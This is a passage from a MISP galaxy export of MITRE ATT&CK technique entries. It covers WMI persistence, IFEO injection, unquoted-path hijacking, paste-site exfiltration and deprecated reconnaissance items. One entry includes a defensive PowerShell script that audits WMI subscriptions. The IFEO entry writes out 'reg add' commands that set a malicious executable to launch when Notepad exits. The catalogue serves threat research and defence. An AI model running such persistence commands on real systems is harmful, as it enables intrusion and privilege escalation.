Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)

WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003"

Table 5397. Table References

Links

https://attack.mitre.org/techniques/T1546/003

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1

https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof-

https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf

https://www.secureworks.com/blog/wmi-persistence

https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf

Exfiltration to Text Storage Sites - T1567.003

Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as <code>pastebin[.]com</code>, are commonly used by developers to share code and other information.

Text storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://attack.mitre.org/techniques/T1608)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)

Note: This is distinct from [Exfiltration to Code Repository](https://attack.mitre.org/techniques/T1567/001), which highlights access to code repositories via APIs.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration to Text Storage Sites - T1567.003"

Table 5398. Table References

Links

https://attack.mitre.org/techniques/T1567/003

https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it

Executable Installer File Permissions Weakness - T1574.005

Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the <code>%TEMP%</code> directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Executable Installer File Permissions Weakness - T1574.005"

Table 5399. Table References

Links

https://attack.mitre.org/techniques/T1574/005

https://seclists.org/fulldisclosure/2015/Dec/34

https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/

Path Interception by Unquoted Path - T1574.009

Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary’s executable to launch.

Service paths (stored in Windows Registry keys) (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., <code>C:\unsafe path with space\program.exe</code> vs. <code>"C:\safe path with space\program.exe"</code>). (Citation: Help eliminate unquoted path) An adversary can place an executable in a higher-level directory of the path, and Windows will resolve that executable instead of the intended one. For example, if the path in a shortcut is <code>C:\program files\myapp.exe</code>, an adversary may create a program at <code>C:\program.exe</code> that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)

This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.

The tag is: misp-galaxy:mitre-attack-pattern="Path Interception by Unquoted Path - T1574.009"

Table 5400. Table References

Links

https://attack.mitre.org/techniques/T1574/009

https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree

https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464

https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

Image File Execution Options Injection - T1546.012

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable></code> where <code><executable></code> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\</code>. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)

Similar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.

Malware may also use IFEO to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)

The tag is: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1546.012"

Table 5401. Table References

Links

http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/

https://attack.mitre.org/techniques/T1546/012

https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/

https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview

https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit

https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml

https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2

Friend/Follow/Connect to targets of interest - T1344

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1344).

Once a persona has been developed, an adversary will use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage)

The tag is: misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1344"

Friend/Follow/Connect to targets of interest - T1344 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1364" with estimative-language:likelihood-probability="almost-certain"

Table 5402. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

https://attack.mitre.org/techniques/T1344

https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation

Friend/Follow/Connect to targets of interest - T1364

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1364).

A form of social engineering designed to build trust and to lay the foundation for future interactions or attacks. (Citation: BlackHatRobinSage)

The tag is: misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1364"

Friend/Follow/Connect to targets of interest - T1364 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Friend/Follow/Connect to targets of interest - T1344" with estimative-language:likelihood-probability="almost-certain"

Table 5403. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

https://attack.mitre.org/techniques/T1364

Identify personnel with an authority/privilege - T1271

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1271).

Personnel internal to a company may have non-electronic specialized access, authorities, or privileges that make them an attractive target for an adversary. One example of this is an individual with financial authority to authorize large transactions. An adversary who compromises this individual might be able to subvert large dollar transfers. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Identify personnel with an authority/privilege - T1271"

Table 5404. Table References

Links

https://attack.mitre.org/techniques/T1271

Receive KITs/KIQs and determine requirements - T1239

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1239).

Applicable agencies and/or personnel receive intelligence requirements and evaluate them to determine sub-requirements related to topics, questions, or requirements. For example, an adversary’s nuclear energy requirements may be further divided into nuclear facilities versus nuclear warhead capabilities. (Citation: AnalystsAndPolicymaking)

The tag is: misp-galaxy:mitre-attack-pattern="Receive KITs/KIQs and determine requirements - T1239"

Table 5405. Table References

Links

https://attack.mitre.org/techniques/T1239

Identify job postings and needs/gaps - T1248

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1248).

Job postings, on either company sites or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on technologies within the organization which could be valuable in an attack, or provide insight into possible security weaknesses or limitations in detection or protection mechanisms. (Citation: JobPostingThreat)

The tag is: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1248"

Identify job postings and needs/gaps - T1248 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1278" with estimative-language:likelihood-probability="almost-certain"

Table 5406. Table References

Links

https://attack.mitre.org/techniques/T1248

Analyze hardware/software security defensive capabilities - T1294

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1294).

An adversary can probe a victim’s network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: OSFingerprinting2014)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze hardware/software security defensive capabilities - T1294"

Table 5407. Table References

Links

https://attack.mitre.org/techniques/T1294

Discover target logon/email address format - T1255

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1255).

Email addresses, logon credentials, and other forms of online identification typically share a common format. This makes guessing other credentials within the same domain easier. For example, if a known email address is first.last@company.com, it is likely that others in the company will have an email in the same format. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Discover target logon/email address format - T1255"

Table 5408. Table References

Links

https://attack.mitre.org/techniques/T1255

Identify job postings and needs/gaps - T1267

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1267).

Job postings, on either company sites or in other forums, provide information on organizational structure and often provide contact information for someone within the organization. This may give an adversary information on people within the organization which could be valuable in social engineering attempts. (Citation: JobPostingThreat)

The tag is: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1267"

Identify job postings and needs/gaps - T1267 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1278" with estimative-language:likelihood-probability="almost-certain"

Table 5409. Table References

Links

https://attack.mitre.org/techniques/T1267

Identify job postings and needs/gaps - T1278

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1278).

Job postings, on either company sites or in other forums, provide information on organizational structure, needs, and gaps in an organization. This may give an adversary an indication of weakness in an organization (such as an under-resourced IT shop). Job postings can also provide information on an organization's structure which could be valuable in social engineering attempts. (Citation: JobPostingThreat) (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1278"

Identify job postings and needs/gaps - T1278 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify job postings and needs/gaps - T1248" with estimative-language:likelihood-probability="almost-certain"

Table 5410. Table References

Links

https://attack.mitre.org/techniques/T1278

Analyze organizational skillsets and deficiencies - T1300

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1300).

Analyze strengths and weaknesses of the target for potential areas on which to focus compromise efforts. (Citation: FakeLinkedIn)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1300"

Analyze organizational skillsets and deficiencies - T1300 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Analyze organizational skillsets and deficiencies - T1297" with estimative-language:likelihood-probability="almost-certain"

Table 5411. Table References

Links

https://attack.mitre.org/techniques/T1300

Exfiltration Over Other Network Medium - T1011

Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.

Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Other Network Medium - T1011"

Table 5412. Table References

Links

https://attack.mitre.org/techniques/T1011

Network Traffic Capture or Redirection - T1410

An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.

A malicious app could register itself as a VPN client on Android or iOS to gain access to network packets. However, on both platforms, the user must grant consent to the app to act as a VPN client, and on iOS the app requires a special entitlement that must be granted by Apple.

Alternatively, if a malicious app is able to escalate operating system privileges, it may be able to use those privileges to gain access to network traffic.

An adversary could redirect network traffic to an adversary-controlled gateway by establishing a VPN connection or by manipulating the device’s proxy settings. For example, Skycure (Citation: Skycure-Profiles) describes the ability to redirect network traffic by installing a malicious iOS Configuration Profile.

If applications encrypt their network traffic, sensitive data may not be accessible to an adversary, depending on the point of capture.

The tag is: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410"

Table 5413. Table References

Links

https://attack.mitre.org/techniques/T1410

https://www.skycure.com/blog/malicious-profiles-the-sleeping-giant-of-ios-security/

Determine 3rd party infrastructure services - T1260

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1260).

Infrastructure services include the hardware, software, and network resources required to operate a communications environment. This infrastructure can be managed by a 3rd party rather than by the owning organization. (Citation: FFIECAwareness) (Citation: Zetter2015Threats)

The tag is: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1260"

Determine 3rd party infrastructure services - T1260 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Determine 3rd party infrastructure services - T1284" with estimative-language:likelihood-probability="almost-certain"

Table 5414. Table References

Links

https://attack.mitre.org/techniques/T1260

Analyze presence of outsourced capabilities - T1303

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1303).

Outsourcing, the arrangement of one company providing goods or services to another company for something that could be done in-house, provides another avenue for an adversary to target. Businesses often have networks, portals, or other technical connections between themselves and their outsourced/partner organizations that could be exploited. Additionally, outsourced/partner organization information could provide opportunities for phishing. (Citation: Scasny2015) (Citation: OPM Breach)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze presence of outsourced capabilities - T1303"

Table 5415. Table References

Links

https://attack.mitre.org/techniques/T1303

Boot or Logon Initialization Scripts - T1037

Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1037"

Table 5416. Table References

Links

https://attack.mitre.org/techniques/T1037

Data from Network Shared Drive - T1039

Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039"

Table 5417. Table References

Links

https://attack.mitre.org/techniques/T1039

Download New Code at Runtime - T1407

Adversaries may download and execute dynamic code not included in the original application package after installation. This technique is primarily used to evade static analysis checks and pre-publication scans in official app stores. In some cases, more advanced dynamic or behavioral analysis techniques could detect this behavior. However, in conjunction with [Execution Guardrails](https://attack.mitre.org/techniques/T1627) techniques, detecting malicious code downloaded after installation could be difficult.

On Android, dynamic code could include native code, Dalvik code, or JavaScript code that utilizes Android WebView’s JavascriptInterface capability.

On iOS, dynamic code could be downloaded and executed through 3rd party libraries such as JSPatch. (Citation: FireEye-JSPatch)

The tag is: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407"

Table 5418. Table References

Links

https://attack.mitre.org/techniques/T1407

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html

https://www.fireeye.com/blog/threat-research/2016/01/hot_or_not_the_bene.html

Windows Management Instrumentation Event Subscription - T1084

Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer’s uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)
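The persistence described above lives in three WMI classes in the <code>root/subscription</code> namespace: an <code>__EventFilter</code> (the WQL query that fires), an <code>__EventConsumer</code> (what runs), and a <code>__FilterToConsumerBinding</code> joining them. The following read-only audit is an added example and is not part of the MISP galaxy or ATT&CK; it enumerates every binding and flags the consumer classes that execute a command or script. The assumption that a stock system carries only the built-in "SCM Event Log" filter/consumer pair is from the author's experience, not from the page.

```powershell
# Added example, not part of the MISP galaxy or ATT&CK: enumerate permanent WMI
# event subscriptions and flag filter/consumer pairs that run a command or script.
# Read-only; run in an elevated Windows PowerShell session. On many stock Windows
# builds the only pre-existing pair is the 'SCM Event Log' filter/consumer
# (NTEventLogEventConsumer); anything else deserves a look.

$ns = 'root/subscription'
$consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer)
$filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter)
$bindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding)

function Get-WmiSubscriptionReport {
    foreach ($b in $bindings) {
        # Filter and Consumer are object references; the CIM cmdlets expose their
        # key property (Name), which we use to look up the full instances.
        $f = $filters   | Where-Object { $_.Name -eq $b.Filter.Name }   | Select-Object -First 1
        $c = $consumers | Where-Object { $_.Name -eq $b.Consumer.Name } | Select-Object -First 1
        $class = if ($c) { $c.CimClass.CimClassName } else { 'MissingConsumer' }

        # What the consumer actually does depends on its class.
        $payload = switch ($class) {
            'CommandLineEventConsumer'  { $c.CommandLineTemplate }
            'ActiveScriptEventConsumer' { if ($c.ScriptFileName) { $c.ScriptFileName } else { $c.ScriptText } }
            default                     { '' }
        }

        [pscustomobject]@{
            Filter     = $b.Filter.Name
            Query      = if ($f) { $f.Query } else { '(filter missing)' }
            Consumer   = $b.Consumer.Name
            Class      = $class
            Payload    = $payload
            # Code-executing consumers are the ones that provide persistence; log,
            # event and SMTP consumers are reported but not flagged.
            Suspicious = $class -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer'
        }
    }
}

Get-WmiSubscriptionReport | Format-Table -AutoSize -Wrap
```

Pair this with a watch on <code>mofcomp.exe</code> executions and on the WMI-Activity operational log, since the registration itself is the moment the filter and consumer first appear; a subscription keyed to uptime or wall-clock time, as the text describes, will otherwise look like an ordinary timer once installed.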

The tag is: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1084"

Table 5419. Table References

Links

https://attack.mitre.org/techniques/T1084

https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.defcon.org/images/defcon-22/dc-22-presentations/Kazanciyan-Hastings/DEFCON-22-Ryan-Kazanciyan-Matt-Hastings-Investigating-Powershell-Attacks.pdf

https://www.secureworks.com/blog/wmi-persistence

https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf

Custom Command and Control Protocol - T1094

Adversaries may communicate using a custom command and control protocol instead of encapsulating commands/data in an existing [Application Layer Protocol](https://attack.mitre.org/techniques/T1071). Implementations include mimicking well-known protocols or developing custom protocols (including raw sockets) on top of the fundamental protocols provided by TCP/IP or another standard network stack.

The tag is: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094"

Table 5420. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1094

Trusted Developer Utilities Proxy Execution - T1127

Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development-related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. (Citation: engima0x3 DNX Bypass) (Citation: engima0x3 RCSI Bypass) (Citation: Exploit Monday WinDbg) (Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process, effectively bypassing application control solutions.

The tag is: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127"

Table 5421. Table References

Links

http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html

https://attack.mitre.org/techniques/T1127

https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/

https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/

App Delivered via Web Download - T1431

The application is downloaded from an arbitrary web site. A link to the application’s download URI may be sent in an email or SMS, placed on another web site that the target is likely to view, or sent via other means (such as QR code).

Detection: An EMM/MDM or mobile threat protection solution can identify the presence of unwanted, known insecure, or malicious apps on devices.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="App Delivered via Web Download - T1431"

App Delivered via Web Download - T1431 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Other Means - T1476" with estimative-language:likelihood-probability="almost-certain"

Table 5422. Table References

Links

https://attack.mitre.org/techniques/T1431

Image File Execution Options Injection - T1183

Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\dbg\ntsd.exe -g notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable></code> where <code><executable></code> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or by a second, non-kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\</code>. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)

An example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)

  • <code>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512</code>

  • <code>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1</code>

  • <code>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"</code>

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.

Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)

The tag is: misp-galaxy:mitre-attack-pattern="Image File Execution Options Injection - T1183"

Table 5423. Table References

Links

https://attack.mitre.org/techniques/T1183

https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/

https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview

https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit

https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml

https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2

SIP and Trust Provider Hijacking - T1198

In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file’s origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)

Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017)

Similar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017)

